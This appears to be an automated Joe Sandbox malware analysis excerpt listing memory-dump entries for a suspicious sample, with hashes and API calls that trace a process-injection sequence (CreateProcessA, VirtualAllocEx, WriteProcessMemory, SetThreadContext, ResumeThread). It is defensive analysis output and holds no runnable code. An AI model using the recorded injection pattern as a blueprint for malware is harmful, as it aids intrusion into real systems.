• String ID:
• API String ID:
• Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
• Instruction ID: 91632e0bc15f6996493c619df13a944c8d28e62f1678bc17592af865e9825ece
• Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
• Instruction Fuzzy Hash: E601C07010DF46CFDB755E24AC987FA6BE0EBD1324FE501EB8487CA091DAA449C0A792

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 415 b15b87-b15b99 CreateThread 418 b15cff-b15d01 415->418 419 b15bb4-b15ce4 CreateThread 418->419 420 b15d07 418->420 424 b15c01-b15d41 419->424 425 b15cea 419->425 420->419 421 b15d0d 420->421 432 b15d43 424->432 433 b15d4b-b15d52 424->433 425->424 426 b15cf0-b15cf6 425->426 426->418 428 b15c20-b15c68 426->428 434 b15d54 432->434 433->434 435 b15d45-b15d47 433->435 437 b15d5f 434->437 436 b15d49 435->436 435->437 436->433 436->437 438 b15d65 437->438 438->438
APIs
Memory Dump Source
• Source File: 00000015.00000002.2624393008.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_b10000_PerceptionSimulationService.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
• Instruction ID: f115bc26a86017fb9e6d2ccb11b381b34155a7f297735a8a4c9f93dd644d4aea
• Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
• Instruction Fuzzy Hash: 64E08C3060DB48CFDB6A9F249D6036A3AE5EBC8314F5902CFC48ADB1D1DF690D468792

Control-flow Graph (figure; legend: Executed / Not Executed)
APIs
Memory Dump Source
• Source File: 00000015.00000002.2624393008.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_b10000_PerceptionSimulationService.jbxd
Similarity
• API ID: wcscpy
• String ID:
• API String ID: 1284135714-0
• Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
• Instruction ID: 9120ffe34ceebeda7ebf540127ecca9a0b95ce4dbac5763fe0392e67e7a47e6c
• Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
• Instruction Fuzzy Hash: D301D67056DE84CFD6769B1854912F966D2FBD43A0FE805D6908ACB092C9244EC0A743

Control-flow Graph (figure; legend: Executed / Not Executed)
APIs
Memory Dump Source
• Source File: 00000015.00000002.2624393008.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_b10000_PerceptionSimulationService.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
• Instruction ID: f60023cfbd6d191ad8989aa80b9ead36d733b0a0263fdaf05cf80be0934b25d3
• Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
• Instruction Fuzzy Hash: 0CC08C63228902F6523A02582C4F0F026C0F30F7A0BEC00CAEC06B0220ED248EF300A7

Control-flow Graph (figure; legend: Executed / Not Executed)
APIs
Memory Dump Source
• Source File: 00000015.00000002.2624393008.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_b10000_PerceptionSimulationService.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
• Instruction ID: 021b111d36429bed50892296e30bf6594da9118aaf425d03ef74051aecf669e8
• Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
• Instruction Fuzzy Hash: D2C04C62554505B6513626996C0A4E125D0A71B760B9C4492FC1676260E9544DE241A2

Execution Graph (figure)

Execution Coverage: 11.8%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 279
Total number of Limit Nodes: 13
Memory Dump Source
• Source File: 00000016.00000002.1617472167.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_6930000_YRtQgzFlDnVSru.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 41a847a6191c1bf4d8347c7bdb3452efbc4f34ba799e34f254653905cef1afd1
• Instruction ID: ba090dedf97e4ab4b076d53291a9698cab0c67bf2c3b409dd4e0700848e42521
• Opcode Fuzzy Hash: 41a847a6191c1bf4d8347c7bdb3452efbc4f34ba799e34f254653905cef1afd1
• Instruction Fuzzy Hash: 7332AC70B013188FDB68DBA9D450BAEB7FAAF89300F244469E146DB7A1CB35ED41CB51

Control-flow Graph

• Rendered graph omitted; basic blocks span 8e3cacc-8e3ce1d, and CreateProcessA is called from block 8e3cc67-8e3cd21.
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08E3CD0E
Memory Dump Source
• Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 688d4c5dbfe4218effc8c4b6cfa1637b8883c82768f947547abc79e39e802054
• Instruction ID: f8a8456449e01ad3e295183260a3ca5d4f320ba27b5c483b471f492386d3606e
• Opcode Fuzzy Hash: 688d4c5dbfe4218effc8c4b6cfa1637b8883c82768f947547abc79e39e802054
• Instruction Fuzzy Hash: A9A17B72D003299FEB24CF68C845BEDBBB2BF48315F148569E848B7240DB749985CF91

Control-flow Graph

• Rendered graph omitted; basic blocks span 8e3cad8-8e3ce1d, and CreateProcessA is called from block 8e3cc67-8e3cd21.
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08E3CD0E
Memory Dump Source
• Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 1206225ca84d6ea1310b08e235ccbc1db8c6b1482d7a9af6ab6ec42c5124fa04
• Instruction ID: 2949ef67c2e3f78c8a41cb3a35b1c9e84d63fdeaa40c745120dcee07f5d7fe9d
• Opcode Fuzzy Hash: 1206225ca84d6ea1310b08e235ccbc1db8c6b1482d7a9af6ab6ec42c5124fa04
• Instruction Fuzzy Hash: 41915B72D003299FEB24CF68C845BEDBBB2BF48315F148569E808B7240DB759985CF91

Control-flow Graph

• Rendered graph omitted; basic blocks span 868fe4-869139, and CreateActCtxA is called from the entry block 868fe4-8690b1.
APIs
• CreateActCtxA.KERNEL32(?), ref: 008690A1
Memory Dump Source
• Source File: 00000016.00000002.1546244244.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_860000_YRtQgzFlDnVSru.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: f3a29416aca01eaf03ac8fc30fc216a6c19166c2ffc4048cd36853457b49adfa
• Instruction ID: f0932b73c43472f370e0cd755c429d4f56da058c7fd368ac0142d9572a1c2543
• Opcode Fuzzy Hash: f3a29416aca01eaf03ac8fc30fc216a6c19166c2ffc4048cd36853457b49adfa
• Instruction Fuzzy Hash: 6F41E1B0C00719CBEB24DFA9C844BDDBBB5FF49314F20816AD448AB291DB75594ACF50

Control-flow Graph

• Rendered graph omitted; basic blocks span 867bac-869139, and CreateActCtxA is called from the entry block 867bac-8690b1.
APIs
• CreateActCtxA.KERNEL32(?), ref: 008690A1
Memory Dump Source
• Source File: 00000016.00000002.1546244244.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_860000_YRtQgzFlDnVSru.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 1c69df7f44561fc33c72373fa6ebec681b607ec2479165098a571f8158c87bd0
• Instruction ID: 4a9bc8482eb40f78f7d9624839da07af03246eac9cddfb876c1ff18d6c149362
• Opcode Fuzzy Hash: 1c69df7f44561fc33c72373fa6ebec681b607ec2479165098a571f8158c87bd0
• Instruction Fuzzy Hash: 2E41C070C00729CBEB24DFA9C84479EBBB5FF49304F20816AD408AB291DB75694ACF90

Control-flow Graph

• Rendered graph omitted; basic blocks span 8d4aa30-8d4ab02, and DrawTextExW is called from block 8d4aaa3-8d4aadc.
APIs
• DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,08D4AA1D,?,?), ref: 08D4AACF
Memory Dump Source
• Source File: 00000016.00000002.1622756840.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_8d40000_YRtQgzFlDnVSru.jbxd
Similarity
• API ID: DrawText
• String ID:
• API String ID: 2175133113-0
• Opcode ID: 91578c44dd4f86ce202f0e30e715bfb65eeaeb4d87c392218fe8dbd57a0c4f4c
• Instruction ID: 7233c4e3f2ca7544bed23400f8d26edb021eca7ce590212f570bf2d1ecec43bf
• Opcode Fuzzy Hash: 91578c44dd4f86ce202f0e30e715bfb65eeaeb4d87c392218fe8dbd57a0c4f4c
• Instruction Fuzzy Hash: 8531DFB5D002099FDB10CF9AD885AEEBBF5EB48360F14842AE918A7210D775A945CFA0

Control-flow Graph

• Rendered graph omitted; basic blocks span 8d49a34-8d4ab02, and DrawTextExW is called from block 8d4aaa3-8d4aadc.
APIs
• DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,08D4AA1D,?,?), ref: 08D4AACF
Memory Dump Source
• Source File: 00000016.00000002.1622756840.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_8d40000_YRtQgzFlDnVSru.jbxd
Similarity
• API ID: DrawText
• String ID:
• API String ID: 2175133113-0
• Opcode ID: 7509491a525955e8aa384c7ebf23a640547f3c497973d9051573f8bf19670494
• Instruction ID: 9a620a112d186436c101ba3c44824092944e2f9d200936d101b3c2ccf44dea1f
• Opcode Fuzzy Hash: 7509491a525955e8aa384c7ebf23a640547f3c497973d9051573f8bf19670494
• Instruction Fuzzy Hash: 6B3100B5D003099FDB10CF9AD884AAEBBF5FB48360F14842EE918A7310D774A945CFA0

Control-flow Graph

• Rendered graph omitted; basic blocks span 8e3c848-8e3c926, and WriteProcessMemory is called from block 8e3c8ae-8e3c8ed.
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08E3C8E0
Memory Dump Source
• Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: ac2e156fb2562ecaeb5e2d0127ab97e8d760aefe7a202f445b9543b669a18aca
• Instruction ID: b94625c809928bfbe5c5732e581fe368661fe0658f5f1e15f074f12d487de5f1
• Opcode Fuzzy Hash: ac2e156fb2562ecaeb5e2d0127ab97e8d760aefe7a202f445b9543b669a18aca
• Instruction Fuzzy Hash: AD213776D003599FDB20CFA9C885BEEBBF1FF48310F148429E959A7240C779A945CB64
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08E3C8E0
Memory Dump Source
• Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 4765371370f05e826b0f2f7964fd785d2d027513b8e1cdf2579a6c525e9f4359
• Instruction ID: e0f759f16ac9fe0aaf4fd0e0254734f870516787f959a01a8bc38b411442078b
• Opcode Fuzzy Hash: 4765371370f05e826b0f2f7964fd785d2d027513b8e1cdf2579a6c525e9f4359
• Instruction Fuzzy Hash: D0213975D003199FDB10DFA9C885BDEBBF5FF48310F508429E918A7240C779A954CBA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08E3C9C0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                                                      • Opcode ID: 1c3b385af86fca005505df5459ff1ab6c65e63fd512e754733174db9517b7aa8
                                                                                                                                                                      • Instruction ID: e54bf198e6e0034b973dabb0e1de0b5ab984f068717349e9580d74ecae4eede4
                                                                                                                                                                      • Opcode Fuzzy Hash: 1c3b385af86fca005505df5459ff1ab6c65e63fd512e754733174db9517b7aa8
                                                                                                                                                                      • Instruction Fuzzy Hash: D8212471D007599FDB20DFAAC885BEEBBF1FF48310F50842AE959A7250C7399941CBA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • Wow64SetThreadContext.KERNELBASE(?,00000000), ref: 08E3C736
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                      • Opcode ID: 71ba2615bcd36db9ce13845da0b934422685149d361e63838229edddf70e1df7
                                                                                                                                                                      • Instruction ID: e92b17f959346e589be575edd630aee2acdd33363747fa36675c46972c480a51
                                                                                                                                                                      • Opcode Fuzzy Hash: 71ba2615bcd36db9ce13845da0b934422685149d361e63838229edddf70e1df7
                                                                                                                                                                      • Instruction Fuzzy Hash: FB214871D003098FDB20DFAAC4857EEBBF5EB48314F54842AD859A7240CB789945CFA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 08D4E71F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1622756840.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8d40000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FromMonitorPoint
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1566494148-0
                                                                                                                                                                      • Opcode ID: 336430fc5fdafa6cfcd03210e0d71f257950bf5d7589d96a76818aa9165150db
                                                                                                                                                                      • Instruction ID: f73c506d7e32304ed071b75f3d1478903d40ba512e47835a63a563387152fbe4
                                                                                                                                                                      • Opcode Fuzzy Hash: 336430fc5fdafa6cfcd03210e0d71f257950bf5d7589d96a76818aa9165150db
                                                                                                                                                                      • Instruction Fuzzy Hash: 2D217AB4D042889FDB20DFA9D445BEEBFF1FB49360F24841AD455AB281C3396905CFA1
                                                                                                                                                                      APIs
                                                                                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 08D4E71F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1622756840.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8d40000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FromMonitorPoint
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1566494148-0
                                                                                                                                                                      • Opcode ID: 448a5061c12af9bec4924097bfba328ccf16ed10cae96dda5bf3da39166a8771
                                                                                                                                                                      • Instruction ID: 2749d71f03b9e1728cafe969ae0cc513ec480c641caa7cacc642e2454e845273
                                                                                                                                                                      • Opcode Fuzzy Hash: 448a5061c12af9bec4924097bfba328ccf16ed10cae96dda5bf3da39166a8771
                                                                                                                                                                      • Instruction Fuzzy Hash: D2216074E002489FDB20DFA9D449BAEFBF5FB48360F10841AE955A7380C779A905CFA1
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08E3C9C0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                                                      • Opcode ID: dadda874d48a2d1de3a1f0e8c6c7e571f15f68a6fcdbd4f7a4676e6d0ee6e6c7
                                                                                                                                                                      • Instruction ID: ff4def82ff01dd4474b9699eff3c23d62588df0bfb85f4f10f11865444623fc4
                                                                                                                                                                      • Opcode Fuzzy Hash: dadda874d48a2d1de3a1f0e8c6c7e571f15f68a6fcdbd4f7a4676e6d0ee6e6c7
                                                                                                                                                                      • Instruction Fuzzy Hash: 30212571D003599FDB10DFAAC885BEEBBF5FF48310F50842AE958A7250C739A901CBA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • Wow64SetThreadContext.KERNELBASE(?,00000000), ref: 08E3C736
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                      • Opcode ID: cefae3ed90e724fb40652b2e3902f0a4a8f57822d4355fcb1420687e13dacd9d
                                                                                                                                                                      • Instruction ID: f55b0dddc85fc9fe9d91147eba8390634319ea1b6ea16189564ebf3d16f11724
                                                                                                                                                                      • Opcode Fuzzy Hash: cefae3ed90e724fb40652b2e3902f0a4a8f57822d4355fcb1420687e13dacd9d
                                                                                                                                                                      • Instruction Fuzzy Hash: 1C211875D003098FDB10DFAAC4857AEBBF5EF48314F54842ED959A7240CB789945CFA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08E3C7FE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: b0df3e288c7913ec1d9d739e51ccc4df4a58515f09638f1ab77ac7442a590107
                                                                                                                                                                      • Instruction ID: d096add8a4b29e15c2aefd3db0f7a2bfa3c2b21dd5ce05837cf5d10842eff2fb
                                                                                                                                                                      • Opcode Fuzzy Hash: b0df3e288c7913ec1d9d739e51ccc4df4a58515f09638f1ab77ac7442a590107
                                                                                                                                                                      • Instruction Fuzzy Hash: 53112976D003499FDB20DFAAC845BDEBBF5EF88310F248419E519A7250C779A950CFA4
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                      • Opcode ID: 0264893a98ce3e41ba0771a90469f49aa97cccbd796369204687fe12f33e1d31
                                                                                                                                                                      • Instruction ID: 8b5483e1197f3476a4c367ff51cbe758f718a26481f75cdf59dfb891ea4cf12e
                                                                                                                                                                      • Opcode Fuzzy Hash: 0264893a98ce3e41ba0771a90469f49aa97cccbd796369204687fe12f33e1d31
                                                                                                                                                                      • Instruction Fuzzy Hash: A7114971D007098FDB20DFAAC44579EFBF5EB88314F208419D559A7240CB35A941CFA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08E3C7FE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: 71f227eed9405c51e73e62c635adb2cfa41daf5fbae0abf7360d189c2b07dfc5
                                                                                                                                                                      • Instruction ID: 6e55eab2d7d4a6f525a2c2c8b3a348e806bbb88c96909f9a0f2f2b56be18e340
                                                                                                                                                                      • Opcode Fuzzy Hash: 71f227eed9405c51e73e62c635adb2cfa41daf5fbae0abf7360d189c2b07dfc5
                                                                                                                                                                      • Instruction Fuzzy Hash: EE112976D003499FDB20DFAAC845BDEBBF5EB88310F148419E515A7250C779A940CFA0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                      • Opcode ID: 113e7f7ce8648c6b5fe31848f8eb1bc4a117bd54cf271c1fcba4a442585b43b3
                                                                                                                                                                      • Instruction ID: bdf7fb2d06bcde1c0780435ee7e873ef5f22f584139dd7533a293ef920e928ee
                                                                                                                                                                      • Opcode Fuzzy Hash: 113e7f7ce8648c6b5fe31848f8eb1bc4a117bd54cf271c1fcba4a442585b43b3
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E113AB1D003498FDB20DFAAC4457AEFBF5EB88724F248419D529A7240CB79A945CFA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 08E3FC85
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                      • Opcode ID: afdf5c5f697e700679762bc99371d0776e398b37458c0a1db21aabb9c2a0f5b7
                                                                                                                                                                      • Instruction ID: 48b2d9336799b11df53f0e546502e06cfc7b77ad1f03b3a6fa8b5d4bda1b4d0c
                                                                                                                                                                      • Opcode Fuzzy Hash: afdf5c5f697e700679762bc99371d0776e398b37458c0a1db21aabb9c2a0f5b7
                                                                                                                                                                      • Instruction Fuzzy Hash: EB11E3B5C003599FDB10DF9AC485BDEBFF8EB48321F108459E958A7210D375A944CFA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0086E646
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1546244244.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_860000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                                                      • Opcode ID: 2221d54857c37b0810f38a976b32454739342d81f2d05c06a69d7a881d58bf26
                                                                                                                                                                      • Instruction ID: a25990cb574da071ac2b78d333a7b9f3f31092dc97361cbc48abbafb4e1f99bf
                                                                                                                                                                      • Opcode Fuzzy Hash: 2221d54857c37b0810f38a976b32454739342d81f2d05c06a69d7a881d58bf26
                                                                                                                                                                      • Instruction Fuzzy Hash: AE110FB9C002498FDB20DF9AC844A9EFBF4EB88320F11842AD529A7210C379A545CFA1
                                                                                                                                                                      APIs
                                                                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 08E3FC85
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                      • Opcode ID: 405f34df75fe5aa73e2609fe9926e9ebaa4a088cf8d95d36d00af4256a49afe5
                                                                                                                                                                      • Instruction ID: 6074c0fe863f4540579f0e7ad41d453e2bb44647b88be2e7d611ab19fb1a9278
                                                                                                                                                                      • Opcode Fuzzy Hash: 405f34df75fe5aa73e2609fe9926e9ebaa4a088cf8d95d36d00af4256a49afe5
                                                                                                                                                                      • Instruction Fuzzy Hash: 1411F5B5800359AFDB10DF9AC549BEEBBF8FB48320F108419E918A7250D375A944CFA5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1543349119.00000000007DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007DD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7dd000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: ccb32afc19210e8c4e54280b461b3e3231bf68e0ffc03d30f245ab53fdca45d5
                                                                                                                                                                      • Instruction ID: b983a4b508c8d5a57cd878b58e035c5c02e5698af364a9cbf77ad48f83467b64
                                                                                                                                                                      • Opcode Fuzzy Hash: ccb32afc19210e8c4e54280b461b3e3231bf68e0ffc03d30f245ab53fdca45d5
                                                                                                                                                                      • Instruction Fuzzy Hash: 3D21F471504240DFDB25DF14E9C0B26BF75FB94318F24C56AE8060A356C33ADC66CBA2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1543458516.00000000007ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7ed000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
